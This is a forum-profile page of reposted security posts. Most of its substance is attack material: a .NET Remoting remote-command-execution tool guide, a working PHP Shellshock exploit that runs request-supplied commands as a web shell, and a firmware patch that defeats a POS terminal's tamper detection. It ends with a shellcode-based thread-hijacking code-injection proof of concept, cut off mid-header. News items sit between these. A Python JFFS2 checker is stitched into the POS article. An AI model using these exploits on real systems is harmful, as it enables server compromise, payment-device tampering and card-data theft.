Everything posted by Nytro
-
[h=1].NET Remoting Services Remote Command Execution[/h]

Source: https://github.com/tyranid/ExploitRemotingService
Exploit Database Mirror: http://www.exploit-db.com/sploits/35280.zip

ExploitRemotingService (c) 2014 James Forshaw
=============================================

A tool to exploit .NET Remoting Services vulnerable to CVE-2014-1806 or CVE-2014-4149. It only works on Windows although some aspects _might_ work in Mono on *nix.

Usage Instructions:
===================

ExploitRemotingService [options] uri command [command args]
Copyright (c) James Forshaw 2014

Uri:
The supported URI are as follows:
tcp://host:port/ObjName - TCP connection on host and portname
ipc://channel/ObjName - Named pipe channel

Options:
  -s, --secure           Enable secure mode
  -p, --port=VALUE       Specify the local TCP port to listen on
  -i, --ipc=VALUE        Specify listening pipe name for IPC channel
      --user=VALUE       Specify username for secure mode
      --pass=VALUE       Specify password for secure mode
      --ver=VALUE        Specify version number for remote, 2 or 4
      --usecom           Use DCOM backchannel instead of .NET remoting
      --remname=VALUE    Specify the remote object name to register
  -v, --verbose          Enable verbose debug output
      --useser           Uses old serialization tricks, only works on full type filter services
  -h, -?, --help

Commands:
  exec [-wait] program [cmdline] : Execute a process on the hosting server
  cmd cmdline                    : Execute a command line process and display stdout
  put localfile remotefile       : Upload a file to the hosting server
  get remotefile localfile       : Download a file from the hosting server
  ls remotedir                   : List a remote directory
  run file [args]                : Upload and execute an assembly, calls entry point
  user                           : Print the current username
  ver                            : Print the OS version

This tool supports exploiting both TCP remoting services and local IPC services. To test the exploit you need to know the name of the .NET remoting service and the port it's listening on (for TCP) or the name of the Named Pipe (for IPC).

You can normally find this in the server or client code. Look for things like calls to:

RemotingConfiguration.RegisterWellKnownServiceType
or
Activator.CreateInstance

You can then try the exploit by constructing an appropriate URL. If TCP you can use the URL format tcp://hostname:port/ServiceName. For IPC use ipc://NamedPipeName/ServiceName. A simple test is to do:

ExploitRemotingService SERVICEURL ver

If successful it should print the OS version of the hosting .NET remoting service. If you get an exception it might be fixed with CVE-2014-1806. At this point try the COM version using:

ExploitRemotingService -usecom SERVICEURL ver

This works best locally, but if you modify the COM configuration and disable the firewall you should be able to get it to work remotely. If that still doesn't work then it might be an up to date server. Instead you can also try the full serialization version using:

ExploitRemotingService -useser SERVICEURL ls c:\

For this to work the remoting service must be running with full typefilter mode enabled (which is some, especially IPC services). It also only works with the commands ls, put and get. But that should be enough to compromise a box.

I've provided an example service to test against.

Source: http://www.exploit-db.com/exploits/35280/
-
[h=1]PHP 5.x - Bypass Disable Functions (via Shellshock)[/h]

# Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions)
# Google Dork: none
# Date: 10/31/2014
# Exploit Author: Ryan King (Starfall)
# Vendor Homepage: http://php.net
# Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror
# Version: 5.* (tested on 5.6.2)
# Tested on: Debian 7 and CentOS 5 and 6
# CVE: CVE-2014-6271

<?php
function shellshock($cmd) { // Execute a command via CVE-2014-6271 @ mail.c:283
  if(strstr(readlink("/bin/sh"), "bash") != FALSE) {
    $tmp = tempnam(".","data");
    putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");
    // In Safe Mode, the user may only alter environment variables whose names
    // begin with the prefixes supplied by this directive.
    // By default, users will only be able to set environment variables that
    // begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive is empty,
    // PHP will let the user modify ANY environment variable!
    mail("a@127.0.0.1","","","","-bv"); // -bv so we don't actually send any mail
  } else return "Not vuln (not bash)";
  $output = @file_get_contents($tmp);
  @unlink($tmp);
  if($output != "") return $output;
  else return "No output, or not vuln.";
}
shellshock($_REQUEST["cmd"]);
?>

Source: http://www.exploit-db.com/exploits/35146/
-
[h=1]Visa, MasterCard Removing Passwords from 3D Secure[/h]
by Brian Donohue, November 17, 2014, 1:17 pm

Payment giants Visa and MasterCard announced plans to eliminate the need for password authentication in the companies' respective "Verified by Visa" and "SecureCode" payment platforms, which are designed to add an additional layer of security to online transactions.

In a press release, MasterCard announced that the ultimate goal of an upgraded 3D Secure system, set to replace the current system next year, will rely on "richer cardholder data" in order to limit password interruptions in the payment process. In the event that an authentication challenge is required, MasterCard says it plans to replace static, memorized passwords with one-time passwords and fingerprint biometrics.

MasterCard is also sponsoring commercial tests to design facial and voice recognition applications for use as authenticators in the future as well as a wristband that authenticates via cardiac rhythm.

Threatpost reached out to MasterCard for clarification on what the company means by "richer cardholder data" but did not hear back by the time of publication.

3D Secure is a card-not-present payment protocol developed by Visa and adopted by a number of other payment card companies. It was designed to curb the growing problem of fraudulent purchases being made online. When a Verified by Visa or SecureCode user enters her card information to an online merchant, the merchant then sends that payment data to Visa or MasterCard. The payment company replies with an iframe that presents the user with an additional password-based authentication form. If the customer enters the correct password, the merchant receives an authorization code to proceed with the transaction.

However, the 3D Secure protocol has been criticized for requiring users to remember yet another complicated password as well as for its user interface, which has been mistaken for a phishing scheme.

"All of us want a payment experience that is safe as well as simple, not one or the other," said Ajay Bhalla, president of enterprise security solutions at MasterCard. "We want to identify people for who they are, not what they remember. We have too many passwords to remember and this creates extra problems for consumers and businesses."

Source: Visa, MasterCard Remove Passwords from 3D Secure | Threatpost
-
[h=1]Scientists develop self-healing virtual machines[/h]
News | Rene Millman | Nov 17, 2014

University of Utah creates software that kills off malware in the cloud

University of Utah scientists have developed software that can help virtual machines self-heal when under attack from malware. Researchers claim the software not only detects and eradicates never-before-seen viruses and other malware, but also automatically repairs damage caused by them. The software then prevents the invader from infecting the computer again.

Dubbed Advanced Adaptive Applications (or A3), the open source software works in a virtual machine, monitoring the VM's OS and applications running on Linux. The researchers created "stackable debuggers"; these multiple debugging applications run on top of each other and look inside the virtual machine while it is running, constantly monitoring for any out-of-the-ordinary behaviour in the computer.

Unlike a normal virus scanner on consumer PCs that compares a list of known viruses to something that has infected the computer, A3 can detect new, unknown viruses or malware automatically by sensing that something is happening in the computer's operation that is not right. It can then stop the virus, carry out a repair of the damaged software code, and then learn to stop that bug entering the machine again.

A3 was co-developed by defence firm Raytheon BBN and was funded by Darpa through its Clean-Slate Design of Resilient, Adaptive, Secure Hosts programme. The four-year project was completed in late September.

The software was tested against the recent Shellshock bug. A3 discovered the Shellshock attack on a web server and repaired the damage in four minutes, according to Eric Eide, University of Utah research assistant professor of computer science.

"It is a pretty big deal that a computer system could automatically, and in a short amount of time, find an acceptable fix to a widespread and important security vulnerability," said Eide. "It's pretty cool when you can pick the Bug of the Week and it works."

Now that the team's project into A3 is completed and proven to work, Eide said the research team is looking to build on the research and figure out a way to use A3 in cloud computing. If used in a cloud service, such as AWS, that a virus or attack could affect the operation of, A3 could repair it in minutes without having to take the servers down.

Source: Scientists develop self-healing virtual machines | Cloud Pro
-
[h=1]Reverse engineering NAND Flash Memory – POS device case study (part 3/3)[/h]
Matt_Oh | November 17, 2014

In my first blog, I talked about a method for acquiring a NAND Flash memory image by directly interacting with the chip. After you acquire a raw firmware image, using the various approaches I proposed with my second blog, you should be able to easily identify the layout of the firmware. At this point in the process, it's time to extract the data and manipulate it.

Figure 1 shows a typical firmware image layout. (This is also relevant to the POS device I worked on.) The U-Boot bootloader can be replaced with another bootloader if you like, and the JFFS2 file system can also be replaced with another popular journaling file system.

Figure 1 Typical firmware image layout

[h=3]1st stage bootloader[/h]

The 1st stage bootloader is usually very architecture-dependent code that performs hardware initialization. The code is automatically loaded at address 0x00000000 by an ARM CPU when it powers up. Figure 2 shows the hardware initialization code from the image I worked on.

Figure 2 Hardware initialization code

The 1st stage bootloader usually loads up the 2nd stage bootloader – like a U-Boot bootloader for example. This is more of a general purpose bootloader and has more features than the 1st stage bootloader. This 2nd stage bootloader enables user interaction through UART, etc. It can also identify and load the kernel, and various images from various sources - including NAND Flash memory and the network location.

Figure 3 Code from U-Boot bootloader

[h=3]U-Boot and U-Boot images[/h]

The U-Boot bootloader uses U-Boot images to pack the next level OS and recovery file system images. Figure 4 shows the definition of the U-Boot image header. It has a magic value of 4 bytes (27 05 19 56) and a new image always starts with a new block. So identifying a U-Boot image is relatively easy. Figure 5 shows a typical U-Boot image header.

Figure 4 U-Boot image header

Figure 5 U-Boot image example

Sometimes, one U-Boot image contains multiple sub-images - Figure 6 shows an example. It contains a Linux kernel image and a Ramdisk image. This is a recovery OS image that is used when the main file system image is damaged or the main kernel doesn't boot up correctly for some reason.

Figure 6 Multi-file image

The DumpFlash tool can be used to dump information and extract sub-images from U-Boot images. Figure 7 shows a good example when using the –U option to extract every U-Boot sub-image from the Flash device.

Figure 7 DumpFlash.py -U option to extract all sub-images

After acquiring the sub-images, depending on the type of the image, you can apply various analysis methods. If the file is a file system image, you can actually mount it on the system and browse the contents. Figure 8 shows an example of mounting an ext2 file system image file extracted from U-Boot image blocks.

Figure 8 Mounting RAM disk image

[h=3]Journaling file system[/h]

Modern embedded systems usually use a journaling file system. This has some advantages over traditional file systems when initial performance is not as good. Usually when the machine starts up, it loads up the whole file system on DRAM first, with modifications to the file system being performed in memory before it is synced to Flash memory. The journaling file system makes it possible to split a file write into small chunks of records, so that it will not re-write the whole file contents when only small parts of it are modified. This is beneficial because reading and writing NAND Flash data is a slow process and excessive writing can diminish the lifespan of a NAND Flash device.

Identifying a JFFS2 file system (one of the popular journaling file systems used in the device) is relatively easy. When the JFFS2 software first prepares the NAND Flash device for JFFS2, it leaves a special marker called an erasermaker in the OOB area of the first page of each block. The erasermaker bytes are usually 85 19 03 20 08 00 00 00. (Figure 9)

Figure 9 JFFS2 erasermaker

After identifying the JFFS2 file system, investigating the contents is very straightforward. Just by using MTD (Memory Technology Device) in Linux systems, you can directly mount it as a file system. (Figure 10)

Figure 10 Mounting JFFS2 image

You can then browse the contents using usual Linux commands. (Figure 11)

Figure 11 JFFS2 contents

[h=3]Modifying firmware[/h]

Acquiring firmware in itself is very useful for further analysis and vulnerability research. It is also beneficial if you can modify the firmware and reload it from the machine. This is not quite as easy, but it's certainly not impossible. The first thing to do is to find the target code to patch. After this you'll need to fix all related page checksums.

For example, the device I worked on has tamper protection. If the device is opened up at least once, it won't boot up correctly and displays error messages similar to those shown in Figure 12. This is to alert the POS owner if any attempts to modify the device are made. Tamper protection is a big deal with POS devices because they process financial transactions. Obviously, if it is back-doored or tampered with, the integrity of the system is lost and it could potentially leak credit and debit card information, such as track 1 and track 2 data.

Figure 12 Tamper protection in action

When I opened up the device, I saw another very curious device inserted between the front and back panels. This device connects the circuits of the front and back panels. (Figure 13)

Figure 13 Front and back panels

When I looked closely at the device, it appeared more interesting. (Figure 14) First I thought it was like plastic padding or something, but it actually had circuits inside it. And as I discovered, trying to tamper with this device is not easy. The conducting materials are painted inside the cover and any attempt to tamper with this easily breaks the circuits. So I suspect this device is used for tamper detection. When you open up the device, the current between the back and front panel is broken, and there might be a proprietary chip that detects this. Of course, this is just speculation for now.

Figure 14 Circuits inside plastic padding

The thing is that I don't know exactly how tamper detection is performed at the hardware level, but it is relatively easy to patch this up at the software level. To circumvent this protection, you need to find the process that actually checks the tamper detection in the device. The process that is responsible for this is the /bin/svcsec program. It is loaded with the rcS script when the system starts up. It uses a proprietary device called /dev/spectrum to retrieve tamper information. The code that is doing the tamper detection is shown in Figure 15 and you can patch the CMP instruction to the CMN instruction to change the control flow.

Figure 15 Patching CMP instruction

Now that you have a patched binary, you need to write this file into the flat JFFS2 image file. Figure 16 shows this process. DumpJFFS2.py has various command line options. The –t and –s options specify the location and size of the patch location in the file. Here we patched 4 bytes at offset 0x11380 of the /bin/svcsec file. It reads the original JFFS2 dump file - named JFFS2-01.dmp - and modifies the affected JFFS2 records, writing the output to the JFFS2-01-Patched.dmp file.

Figure 16 DumpJFFS2.py tool to overwrite modified JFFS2 record

Figure 17 and Figure 18 show how this command modifies the affected JFFS2 record. The original record has a compressed data size of 0xF4 bytes. If you decompressed this data using the ZLIB library, it would be part of the executable code from /bin/svcsec. The decompressed size is 0x100 bytes. Out of these bytes, we modify only 4 bytes and compress the entire data again, which creates new compressed bytes of 0xEF size. After appending a few 0xFF padding bytes to fill the space between this and the next JFFS2 record, the script calculates 3 CRC values – header, data and node - and writes them back to the header.

Figure 17 Original JFFS2 record

Figure 18 Modified JFFS2 record

Now with the patched JFFS2 raw image, you need to flash it back to Flash memory. With the changes made, it affects one page in this case. It doesn't need to flash whole blocks and pages of the image, it just needs to write back one page. Figure 19 shows the command line options to achieve this. The –OJ option specifies the patched dump file to write back and the –C option specifies the original JFFS2 dump file. The program compares both images and only writes the modified data. The –b option specifies the range of JFFS2 file system blocks. We already got this information with the DumpFlash.py –j command. You need to erase a block before writing NAND Flash pages – that is how it usually works with Flash memory, so the script will erase the affected block and rewrite the whole block, not just the page.

Figure 19 DumpFlash to write affected page

Movie 1 shows the process of re-soldering the Flash memory back to the board after modifying the firmware. If this process is successful, you can turn on the device and see it working again with the modified firmware.

Movie 1 Re-soldering Flash memory back to the board

[h=3]Conclusion[/h]

After identifying the layout of the firmware using the various methods I shared last time, you can extract bootloader and file system images. I talked about extracting and modifying U-Boot images and JFFS2 images, which are very popular with embedded systems. Journaling file systems are especially interesting in the way they work and how they are laid out in the image file. Modifying a few bytes in the binary inside the file system involves various levels of modification to the image. First, the whole JFFS2 record that contains the affected bytes needs to be modified. Then the page that contains the specific JFFS2 record needs to be checksummed again. Next you need to write the image back to the physical Flash memory. Finally, you need to re-solder the chip to the board again.

I used the example of a POS device. This POS device had tamper protection, but the check for tampering was performed at the userland process level, which means that if you can modify the code, the protection is off. So even with very sophisticated hardware devices that detect tampering, a few bytes of code modification nullifies the whole physical security concept.

Source: Reverse engineering NAND Flash Memory – POS device... - HP Enterprise Business Community
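The three CRCs the article recomputes for a patched record (header, node and data) are also what an analyst checks to spot a modified record in a dump. The following Python is an added example, not code from the article or from the DumpFlash/DumpJFFS2 tools: it builds a small constructed JFFS2 image and walks its inode records, flagging any record whose CRCs disagree with its contents. The jffs2_raw_inode layout, little-endian byte order and the zero-seeded CRC-32 variant are my assumptions about JFFS2; the sample "code" bytes are constructed.

```python
import struct
import zlib

# jffs2_raw_inode, little-endian (assumed layout): magic, nodetype, totlen, hdr_crc,
# ino, version, mode, uid, gid, isize, atime, mtime, ctime, offset, csize, dsize,
# compr, usercompr, flags, data_crc, node_crc
RAW_INODE_FMT = "<HHIIIIIHHIIIIIIIBBHII"
RAW_INODE_SIZE = struct.calcsize(RAW_INODE_FMT)  # 68 bytes
JFFS2_MAGIC = 0x1985
NODETYPE_INODE = 0xE002
COMPR_NONE, COMPR_ZLIB = 0, 6


def jffs2_crc32(data: bytes) -> int:
    """JFFS2's crc32(0, data): reflected CRC-32 with zero seed and no final inversion.
    zlib.crc32 applies a 0xFFFFFFFF seed/final XOR, so both are undone here."""
    return zlib.crc32(data, 0xFFFFFFFF) ^ 0xFFFFFFFF


def build_inode_node(ino: int, version: int, offset: int, data: bytes) -> bytes:
    """Build one data-carrying inode record with all three CRCs (constructed input).
    zlib is used only when it actually shrinks the chunk, as the file system does."""
    cdata, compr = zlib.compress(data), COMPR_ZLIB
    if len(cdata) >= len(data):
        cdata, compr = data, COMPR_NONE
    head = struct.pack("<HHI", JFFS2_MAGIC, NODETYPE_INODE, RAW_INODE_SIZE + len(cdata))
    hdr_crc = jffs2_crc32(head)                        # covers the first 8 bytes only
    body = struct.pack("<IIIHHIIIIIIIBBH", ino, version, 0o100755, 0, 0,
                       offset + len(data), 0, 0, 0, offset, len(cdata), len(data),
                       compr, 0, 0)
    fixed = head + struct.pack("<I", hdr_crc) + body   # first 60 bytes of the record
    node_crc = jffs2_crc32(fixed)                      # excludes data_crc and node_crc
    return fixed + struct.pack("<II", jffs2_crc32(cdata), node_crc) + cdata


def pad4(node: bytes) -> bytes:
    """Records are 4-byte aligned; the gap stays erased (0xFF), as on NAND."""
    return node + b"\xff" * (-len(node) % 4)


def walk_nodes(image: bytes):
    """Yield (offset, info) for each record of a flat JFFS2 dump, verifying
    hdr_crc, node_crc and data_crc so a modified record stands out."""
    pos = 0
    while pos + 12 <= len(image):
        if image[pos:pos + 4] == b"\xff\xff\xff\xff":  # erased padding / free space
            pos += 4
            continue
        magic, nodetype, totlen, hdr_crc = struct.unpack_from("<HHII", image, pos)
        if magic != JFFS2_MAGIC or totlen < 12:
            yield pos, {"error": "not a JFFS2 node"}
            return
        info = {"type": nodetype, "totlen": totlen,
                "hdr_crc_ok": hdr_crc == jffs2_crc32(image[pos:pos + 8])}
        if (nodetype == NODETYPE_INODE and totlen >= RAW_INODE_SIZE
                and pos + RAW_INODE_SIZE <= len(image)):
            f = struct.unpack_from(RAW_INODE_FMT, image, pos)
            csize, compr = f[14], f[16]
            cdata = image[pos + RAW_INODE_SIZE:pos + RAW_INODE_SIZE + csize]
            data = None
            try:  # corrupted zlib data is reported via data_crc_ok, not an exception
                data = zlib.decompress(cdata) if compr == COMPR_ZLIB else cdata
            except zlib.error:
                pass
            info.update(ino=f[4], version=f[5], offset=f[13], csize=csize,
                        dsize=f[15], compr=compr, data=data,
                        node_crc_ok=f[20] == jffs2_crc32(image[pos:pos + RAW_INODE_SIZE - 8]),
                        data_crc_ok=f[19] == jffs2_crc32(cdata))
        yield pos, info
        pos += (totlen + 3) & ~3


# Constructed stand-in for 0x100 bytes of ARM code (repeated 16-byte pattern)
SAMPLE_CODE = bytes.fromhex("0000a0e1 04b02de5 00b08de2 1eff2fe1") * 16


def build_sample_image() -> bytes:
    """Inode 0x11 stored as two records (file offsets 0x00 and 0x80), constructed."""
    return (pad4(build_inode_node(0x11, 1, 0x00, SAMPLE_CODE[:0x80]))
            + pad4(build_inode_node(0x11, 2, 0x80, SAMPLE_CODE[0x80:]))
            + b"\xff" * 64)


def tampered_records(image: bytes):
    """Offsets of records whose CRCs do not agree with their contents."""
    return [off for off, n in walk_nodes(image)
            if not all(n.get(k, True) for k in ("hdr_crc_ok", "node_crc_ok", "data_crc_ok"))]
```

A record patched the way the article describes passes this walk only if all three CRCs were rewritten; a byte-level edit of the compressed data alone fails data_crc, and an edit to the fixed header alone fails node_crc.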
-
[h=3]PoC: Code injection via thread hijacking[/h]
by BKsky » Sun Nov 16, 2014 8:46 pm

nothing new, it's just a PoC. No NtWriteVirtualMemory, NtMapViewofSection for writing the code. By nature, hijacking threads can have a high level of instability, consider it. Stability and requirements can be improved; it's possible to inject our code without opening a shared section. Hint: any process that can keep our code (somehow) is useful.

code.asm:

include masm32rt.inc
option casemap:none

.data
BegMark BYTE 62h, 6Bh, 30h, 30h, 30h, 30h, 30h, 30h, 30h, 30h, 30h, 30h, 30h, 30h, 30h, 30h
        BYTE 30h, 30h, 30h, 30h, 30h, 30h, 30h, 30h, 30h, 30h, 30h, 30h, 30h, 30h, 30h, 30h
        BYTE 37h, 46h, 46h, 46h, 46h, 46h, 46h, 46h
SizeofBegMark EQU $-BegMark

Shellcode db 83h, 0C4h, 0Ch, 8Bh, 85h, 0E8h, 00h, 00h, 00h, 83h, 0ADh, 3Ch, 05h, 00h, 00h, 04h
          db 8Bh, 09Dh, 3Ch, 05h, 00h, 00h, 89h, 03h, 0E8h, 00h, 00h, 00h, 00h, 5Fh, 81h, 0C7h
          db 23h, 00h, 00h, 00h, 6Ah, 00h, 6Ah, 00h, 55h, 57h, 6Ah, 00h, 6Ah, 00h, 0FFh, 95h
          db 0E0h, 00h, 00h, 00h, 09Dh, 58h, 59h, 5Ah, 5Bh, 5Dh, 5Eh, 5Fh, 5Ch, 0C3h, 8Bh, 0FFh
          db 8Bh, 74h, 24h, 04h, 64h, 8Bh, 3Dh, 18h, 00h, 00h, 00h, 8Bh, 7Fh, 30h, 8Bh, 7Fh
          db 10h, 0Fh, 0B7h, 47h, 38h, 85h, 0C0h, 74h, 14h, 8Dh, 86h, 96h, 00h, 00h, 00h, 6Ah
          db 00h, 50h, 0FFh, 77h, 3Ch, 6Ah, 00h, 0FFh, 96h, 0E4h, 00h, 00h, 00h, 0C2h, 04h
SizeofShellcode EQU $-Shellcode

UCSTR TittleMsg, "Hello World from:",0

UNICODE_STRING STRUCT
    _Length       WORD ?
    MaximumLength WORD ?
    Buffer        PWSTR ?
UNICODE_STRING ENDS
LPUNICODE_STRING typedef PTR UNICODE_STRING

RTL_DRIVE_LETTER_CURDIR STRUCT
    Flags     WORD ?
    _Length   WORD ?
    TimeStamp DWORD ?
    DosPath   UNICODE_STRING <>
RTL_DRIVE_LETTER_CURDIR ends
LPRTL_DRIVE_LETTER_CURDIR typedef ptr RTL_DRIVE_LETTER_CURDIR

RTL_USER_PROCESS_PARAMETERS STRUCT
    MaximumLength        DWORD ?
    _Length              DWORD ?
    Flags                DWORD ?
    DebugFlags           DWORD ?
    ConsoleHandle        LPVOID ?
    ConsoleFlags         DWORD ?
    StandardInput        LPVOID ?
    StandardOutput       LPVOID ?
    StandardError        LPVOID ?
    CurrentDirectoryPath UNICODE_STRING <>
    Handle               HANDLE ?
    DllPath              UNICODE_STRING <>
    ImagePathName        UNICODE_STRING <> ; Full path in DOS-like format to process'es file image.
    CommandLine          UNICODE_STRING <>
    Environment          LPVOID ?
    StartingX            DWORD ?
    StartingY            DWORD ?
    CountX               DWORD ?
    CountY               DWORD ?
    CountCharsX          DWORD ?
    CountCharsY          DWORD ?
    FillAttribute        DWORD ?
    WindowFlags          DWORD ?
    ShowWindowFlags      DWORD ?
    WindowTitle          UNICODE_STRING <>
    DesktopInfo          UNICODE_STRING <>
    ShellInfo            UNICODE_STRING <>
    RuntimeData          UNICODE_STRING <>
    CurrentDirectores    RTL_DRIVE_LETTER_CURDIR <>
    EnvironmentSize      DWORD ?
    EnvironmentVersion   DWORD ?
RTL_USER_PROCESS_PARAMETERS ends
LPRTL_USER_PROCESS_PARAMETERS typedef ptr RTL_USER_PROCESS_PARAMETERS

REMOTE_CODE_STRUCTURE STRUCT DWORD
    BeginningMark    BYTE SizeofBegMark dup (?)
    Shellcode        BYTE SizeofShellcode dup (?)
    TittleMsgBox     WCHAR sizeof TittleMsg dup (?)
    CreateThread     LPVOID ?
    MessageBoxW      LPVOID ?
    tc_Eip           DWORD ?
    StackSpace       DWORD 100h dup (?)
    RetRmCode0       LPVOID ?
    lpAddress        LPVOID ?
    dwSize           DWORD ?
    flAllocationType DWORD ?
    flProtect        DWORD ?
    RetRmCode1       DWORD ?
    PopEsi           LPVOID ?
    RetRmCode2       DWORD ?
    PopEcx           LPVOID ?
    RetRmCode3       DWORD ?
    src              LPVOID ?
    count            DWORD ?
    _Flags           DWORD ?
    _Eax             DWORD ?
    _Ecx             DWORD ?
    _Edx             DWORD ?
    _Ebx             DWORD ?
    _Ebp             DWORD ?
    _Esi             DWORD ?
    _Edi             DWORD ?
    _Esp             DWORD ?
REMOTE_CODE_STRUCTURE ends
LPREMOTE_CODE_STRUCTURE typedef ptr REMOTE_CODE_STRUCTURE

s REMOTE_CODE_STRUCTURE <"begin","sh">

.code
entry_shellcode:
    add esp,0ch
    assume ebp:LPREMOTE_CODE_STRUCTURE
    mov eax,[ebp].tc_Eip
    sub [ebp]._Esp,sizeof DWORD
    mov ebx,[ebp]._Esp
    mov [ebx],eax
    call get_eip
get_eip:
    pop edi
    add edi,new_thread-get_eip
    push NULL
    push 0
    push ebp
    push edi
    push 0
    push NULL
    call [ebp].CreateThread
    assume ebp:nothing
    popfd
    pop eax
    pop ecx
    pop edx
    pop ebx
    pop ebp
    pop esi
    pop edi
    pop esp
    ret

ALIGN 4
new_thread:
    assume fs:nothing
    mov esi,[esp+04h]
    mov edi,fs:[18h]
    mov edi,[edi+30h]
    mov edi,[edi+10h]
    assume edi:LPRTL_USER_PROCESS_PARAMETERS
    assume esi:LPREMOTE_CODE_STRUCTURE
    movzx eax,[edi].ImagePathName._Length
    test eax,eax
    je Finish_
    lea eax,[esi].TittleMsgBox
    push MB_OK
    push eax
    push [edi].ImagePathName.Buffer
    push NULL
    call [esi].MessageBoxW
Finish_:
    ret 04h
end entry_shellcode

inject.h:

#pragma once
#include <Windows.h>
#include <stdio.h>
#include "NtDef.h" // your nt definitions

#define PTR_ADD_OFFSET(Pointer,Offset) ((LPVOID)((ULONG_PTR)(Pointer) + (ULONG_PTR)(Offset)))
#define PTR_SUB_OFFSET(Pointer,Offset) ((LPVOID)((ULONG_PTR)(Pointer) - (ULONG_PTR)(Offset)))

const LPWSTR SharedSections[] = {
    TEXT("\\BaseNamedObjects\\ShimSharedMemory"),
    TEXT("\\BaseNamedObjects\\mmGlobalPnpInfo"),
    TEXT("\\BaseNamedObjects\\__ComCatalogCache__"),
    TEXT("\\BaseNamedObjects\\windows_ie_global_counters"),
    TEXT("\\BaseNamedObjects\\SessionImmersiveColorSet"),
    TEXT("\\BaseNamedObjects\\windows_shell_global_counters"),
};

/*
50    PUSH EAX
FFD6  CALL ESI
*/
const BYTE RmCode0[] = { 0x50,0xFF,0xD6 };
/*
5E  POP ESI
5B  POP EBX
C3  RETN
*/
const BYTE RmCodeEsi[] = { 0x5E,0x5B,0xC3 };
/*
5E  POP ESI
C3  RETN
*/
const BYTE RmCode1[] = { 0x5E,0xC3 };
/*
59  POP ECX
C3  RETN
*/
const BYTE RmCode2[] = { 0x59,0xC3 };
/*
50    PUSH EAX
53    PUSH EBX
FFD6  CALL ESI
*/
const BYTE RmCode3[] = { 0x50,0x53,0xFF,0xD6 };
/*
57    PUSH EDI
FFD1  CALL ECX
*/
const BYTE RmCodeEsi2[] = { 0x57,0xFF,0xD1 };
/*
5E       POP ESI
C2 0C00  RETN 0x04
*/
const BYTE RMCodeEcx[] = { 0x5E,0xC2,0x04,0x00 };

const BYTE BegMark[] = {
    0x62, 0x6B, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30,
    0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30,
    0x37, 0x46, 0x46, 0x46, 0x46, 0x46, 0x46, 0x46
};

const BYTE Code[] = {
    0x83, 0xC4, 0x0C, 0x8B, 0x85, 0xE8, 0x00, 0x00, 0x00, 0x83, 0xAD, 0x3C, 0x05, 0x00, 0x00, 0x04,
    0x8B, 0x9D, 0x3C, 0x05, 0x00, 0x00, 0x89, 0x03, 0xE8, 0x00, 0x00, 0x00, 0x00, 0x5F, 0x81, 0xC7,
    0x23, 0x00, 0x00, 0x00, 0x6A, 0x00, 0x6A, 0x00, 0x55, 0x57, 0x6A, 0x00, 0x6A, 0x00, 0xFF, 0x95,
    0xE0, 0x00, 0x00, 0x00, 0x9D, 0x58, 0x59, 0x5A, 0x5B, 0x5D, 0x5E, 0x5F, 0x5C, 0xC3, 0x8B, 0xFF,
    0x8B, 0x74, 0x24, 0x04, 0x64, 0x8B, 0x3D, 0x18, 0x00, 0x00, 0x00, 0x8B, 0x7F, 0x30, 0x8B, 0x7F,
    0x10, 0x0F, 0xB7, 0x47, 0x38, 0x85, 0xC0, 0x74, 0x14, 0x8D, 0x86, 0x98, 0x00, 0x00, 0x00, 0x6A,
    0x00, 0x50, 0xFF, 0x77, 0x3C, 0x6A, 0x00, 0xFF, 0x96, 0xE4, 0x00, 0x00, 0x00, 0xC2, 0x04
};

const WCHAR MsgTittle[] = TEXT("Hello World from:");

#pragma pack(push,4)
typedef struct _REMOTE_CODE_STRUCTURE
{
    BYTE   BeginningMark[sizeof(BegMark)];
    BYTE   Shellcode[sizeof(Code)];
    WCHAR  TittleMsgBox[sizeof(MsgTittle)];
    LPVOID CreateThread;
    LPVOID MessageBoxW;
    DWORD  tc_Eip;
    DWORD  StackSpace[0x100];
    LPVOID RetRmCode0;
    LPVOID lpAddress;
    SIZE_T dwSize;
    DWORD  flAllocationType;
    DWORD  flProtect;
    LPVOID RetRmCode1;
    LPVOID PopEsi;
    LPVOID RetRmCode2;
    LPVOID PopEcx;
    LPVOID RetRmCode3;
    LPVOID src;
    SIZE_T count;
    DWORD  _Flags;
    DWORD  _Eax;
    DWORD  _Ecx;
    DWORD  _Edx;
    DWORD  _Ebx;
    DWORD  _Ebp;
    DWORD  _Esi;
    DWORD  _Edi;
    DWORD  _Esp;
}REMOTE_CODE_STRUCTURE,*PREMOTE_CODE_STRUCTURE;
#pragma pack(pop)

extern "C"
{
    NTSTATUS NTAPI LdrLoadDll(IN PWCHAR PathToFile OPTIONAL,IN ULONG Flags OPTIONAL,IN PUNICODE_STRING ModuleFileName,OUT PHANDLE ModuleHandle);
    NTSTATUS NTAPI RtlGetVersion(PRTL_OSVERSIONINFOW lpVersionInformation);
    NTSTATUS NTAPI NtQuerySystemInformation(IN SYSTEM_INFORMATION_CLASS SystemInformationClass,IN OUT PVOID SystemInformation,IN ULONG SystemInformationLength,OUT PULONG ReturnLength OPTIONAL);
    NTSTATUS NTAPI NtQueryInformationProcess(IN HANDLE ProcessHandle,IN PROCESS_INFORMATION_CLASS ProcessInformationClass,OUT PVOID ProcessInformation,IN ULONG ProcessInformationLength,OUT PULONG ReturnLength);
    NTSTATUS NTAPI NtOpenThread(OUT PHANDLE ThreadHandle,IN ACCESS_MASK AccessMask,IN POBJECT_ATTRIBUTES ObjectAttributes,IN PCLIENT_ID ClientId);
    NTSTATUS NTAPI NtSuspendThread(IN HANDLE ThreadHandle,OUT PULONG PreviousSuspendCount OPTIONAL);
    NTSTATUS NTAPI NtResumeThread(IN HANDLE ThreadHandle,OUT PULONG SuspendCount OPTIONAL);
    NTSTATUS NTAPI NtUnmapViewOfSection(IN HANDLE ProcessHandle,IN PVOID BaseAddress );
    NTSTATUS NTAPI NtQueueApcThread(IN HANDLE ThreadHandle,IN PIO_APC_ROUTINE ApcRoutine,IN PVOID ApcRoutineContext OPTIONAL,IN PIO_STATUS_BLOCK ApcStatusBlock OPTIONAL,IN ULONG ApcReserved OPTIONAL);
